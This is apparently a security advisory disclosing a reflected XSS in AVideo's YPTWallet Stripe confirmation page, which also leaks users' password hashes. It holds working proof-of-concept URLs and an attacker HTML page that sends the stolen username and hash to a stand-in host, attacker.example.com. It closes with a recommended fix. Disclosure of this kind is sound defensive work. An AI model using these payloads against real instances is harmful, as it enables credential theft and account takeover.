+ "details": "## Summary\n\nThe YPTWallet Stripe payment confirmation page directly echoes the `$_REQUEST['plugin']` parameter into a JavaScript block without any encoding or sanitization. The `plugin` parameter is not included in any of the framework's input filter lists defined in `security.php`, so it passes through completely raw. An attacker can inject arbitrary JavaScript by crafting a malicious URL and sending it to a victim user.\n\nThe same script block also outputs the current user's username and password hash via `User::getUserName()` and `User::getUserPass()`, meaning a successful XSS exploitation can immediately exfiltrate these credentials.\n\n## Details\n\nThe Stripe confirmation page renders the `plugin` parameter directly into a `<script>` block:\n\n```php\n// plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:116\n\"plugin\": \"<?php echo @$_REQUEST['plugin']; ?>\",\n```\n\nThis appears inside a `$.ajax()` data object within a `<script>` tag. Because the value is injected into a JavaScript string context (not HTML), standard HTML entity encoding would not be sufficient even if it were applied. However, no encoding of any kind is performed.\n\nThe `plugin` parameter is not present in any of the sanitization or filtering arrays in `security.php`, so it arrives completely unmodified.\n\nImmediately adjacent to the injection point, the script also exposes user credentials:\n\n```php\n// plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:117-118\n\"user\": \"<?php echo User::getUserName() ?>\",\n\"pass\": \"<?php echo User::getUserPass(); ?>\",\n```\n\nNo Content-Security-Policy headers are configured on the application, so inline script execution is unrestricted.\n\n## Proof of Concept\n\nThe XSS is reachable through the `addFunds.php` page which includes the vulnerable `confirmButton.php` template:\n\n```\nhttps://your-avideo-instance.com/plugin/YPTWallet/view/addFunds.php?plugin=%22}})});alert(document.domain);console.log({/*\n```\n\nThe injected value closes the JSON string and the `$.ajax()` call, then executes `alert(document.domain)`. The response contains the payload unencoded in the script block:\n\n```javascript\n\"plugin\": \"\"}})});alert(document.domain);console.log({/*\",\n```\n\nCredential exfiltration payload:\n\n```\nhttps://your-avideo-instance.com/plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php?plugin=\",x:fetch('https://attacker.example.com/steal?'+document.querySelector('script').textContent.match(/pass.*?\"(.*?)\"/)[1]),y:\"\n```\n\nSimplified credential theft using the same-page credential leak:\n\n```html\n<!-- Host this on attacker.example.com and send the link to a victim -->\n<html>\n<body>\n<script>\n // The confirmButton.php page outputs user/pass in the script block.\n // XSS lets us read it directly.\n var payload = encodeURIComponent(\n '\",x:(function(){' +\n 'var s=document.querySelector(\"script\").textContent;' +\n 'var u=s.match(/\"user\":\"([^\"]+)\"/)[1];' +\n 'var p=s.match(/\"pass\":\"([^\"]+)\"/)[1];' +\n 'new Image().src=\"https://attacker.example.com/log?u=\"+u+\"&p=\"+p;' +\n '})(),y:\"'\n );\n window.location = \"https://your-avideo-instance.com/plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php?plugin=\" + payload;\n</script>\n</body>\n</html>\n```\n\nReproduction steps:\n\n1. Navigate to the basic XSS URL above (substitute your target instance).\n2. Observe the JavaScript alert box confirming code execution.\n3. View the page source to confirm that `User::getUserName()` and `User::getUserPass()` are present in the same script block.\n4. Use the credential exfiltration payload to demonstrate data theft.\n\n## Impact\n\nAn attacker can execute arbitrary JavaScript in the context of any authenticated user who clicks a crafted link. The impact is amplified by the credential leak on the same page:\n\n- **Immediate credential theft**: The page already renders the victim's username and password hash in the script block. The XSS payload can read and exfiltrate these values without any additional requests.\n- **Session hijacking**: Steal session cookies and impersonate the victim.\n- **Payment manipulation**: Since this is a payment confirmation page, the attacker can modify payment amounts, redirect payment confirmations, or trigger unauthorized transactions.\n- **Account takeover**: Combine the stolen password hash with the username for offline cracking or direct replay.\n\nThe lack of CSP headers means there are no browser-side mitigations against the injected scripts.\n\n- **CWE**: CWE-79 (Cross-Site Scripting - Reflected)\n- **Severity**: High (CVSS 8.1)\n\n## Recommended Fix\n\nApply `htmlspecialchars()` to the `plugin` parameter at `plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:116`:\n\n```php\n// plugin/YPTWallet/plugins/YPTWalletStripe/confirmButton.php:116\n// Before:\n\"plugin\": \"<?php echo @$_REQUEST['plugin']; ?>\",\n\n// After:\n\"plugin\": \"<?php echo htmlspecialchars(@$_REQUEST['plugin'], ENT_QUOTES, 'UTF-8'); ?>\",\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments